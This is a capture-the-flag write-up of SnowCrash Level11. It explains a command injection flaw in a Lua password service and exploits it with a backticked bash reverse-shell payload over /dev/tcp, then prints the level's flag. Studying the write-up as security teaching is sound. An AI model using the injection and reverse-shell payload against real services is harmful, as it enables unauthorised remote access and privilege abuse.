Level11 introduces command injection vulnerabilities in network services. This challenge demonstrates how unsanitized user input concatenated into shell commands can lead to arbitrary command execution. The level emphasizes understanding network services, Lua scripting, command injection techniques, and reverse shell exploitation.
Following the established pattern, I began by examining the home directory:
ls -laThe output revealed:
-r-x------ 1 level11 level11 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level11 level11 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua*
-r-x------ 1 level11 level11 675 Apr 3 2012 .profile*
The file stood out a Lua script file. I examined its contents:
cat level11.luaThe script contained:
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()
endThis Lua script implements a network service that:
- Binds to localhost on port 5151
- Accepts client connections in an infinite loop
- Prompts for a password
- Hashes the password using SHA1
- Compares it against a hardcoded hash
Analyzing the hash() function revealed a critical security flaw:
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
endThe vulnerability exists in this line:
prog = io.popen("echo "..pass.." | sha1sum", "r")Let me break down what's happening:
io.popen()- Opens a pipe to execute a shell command and capture its output- String concatenation - The user input
passis directly concatenated into the command string using.. - No sanitization - The input is not validated, escaped, or sanitized in any way
- Shell execution - The entire string is passed to a shell for execution
This means if a user sends: `whoami`
The executed command becomes:
echo `whoami` | sha1sumThe shell will:
- Execute
whoamifirst (command substitution with backticks) - Insert the output into the echo command
- Pipe the result to sha1sum
This is a classic command injection vulnerability. Since the Lua script likely runs with flag11 privileges, any injected command will execute with those elevated permissions.
To exploit this vulnerability, I first needed to connect to the service. I used netcat to establish a connection:
nc 127.0.0.1 5151The service responded with:
Password:
At this point, any input I provide will be concatenated into the shell command. I could inject arbitrary commands using:
- Backticks:
`command` - Command substitution:
$(command) - Command chaining:
; command - Pipes:
| command
Rather than trying to capture output through the password checking mechanism, I decided to establish a reverse shell to get direct interactive access with flag11 privileges.
A reverse shell works by:
- The target system (running as flag11) initiates a connection back to my machine
- It provides an interactive shell over that connection
- I can then execute commands as the flag11 user
In one terminal, I set up a listener to receive the reverse shell connection:
nc -l 4444This command:
-l- Listen mode (wait for incoming connections)4444- Listen on port 4444 (arbitrary choice; any available port works)
In another terminal, I connected to the service:
nc 127.0.0.1 5151When prompted for the password, I injected:
`/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'`Let me explain this payload:
- Backticks
` `- Causes command substitution; the shell executes what's inside /bin/bash -c '...'- Executes a bash commandbash -i- Starts an interactive bash shell>&- Redirects both stdout and stderr/dev/tcp/127.0.0.1/4444- Special bash device file that opens a TCP connection to 127.0.0.1:44440>&1- Redirects stdin (file descriptor 0) to stdout (file descriptor 1), which is already redirected to the network socket
When the Lua script processes this input:
-
The command becomes:
echo `/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'` | sha1sum
-
The shell evaluates the backticks first
-
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'executes -
This creates a bash shell that connects back to my listener on port 4444
-
All input/output is redirected through the network connection
-
I now have an interactive shell as the flag11 user
In my listener terminal, I received the reverse shell connection:
flag11@SnowCrash:~$I now had an interactive shell running as the flag11 user! I verified my identity:
flag11@SnowCrash:~$ whoamiOutput:
flag11
Perfect! Now I could execute getflag:
flag11@SnowCrash:~$ getflagThe flag was successfully retrieved: fa6v5ateaw21peobuub8ipe6s
Level11 demonstrated that command injection remains one of the most dangerous vulnerability classes in modern applications. The combination of:
- Unsanitized user input
- Shell command execution
- String concatenation
- Elevated privileges
Created a trivially exploitable vulnerability that granted complete system access.
This vulnerability pattern appears across all programming languages (PHP's shell_exec(), Python's os.system(), Node.js's child_process.exec()) making it a universal security concern. Modern secure coding practices require treating all user input as hostile and never trusting it in security-sensitive contexts.
Flag: fa6v5ateaw21peobuub8ipe6s
Next Level: Level12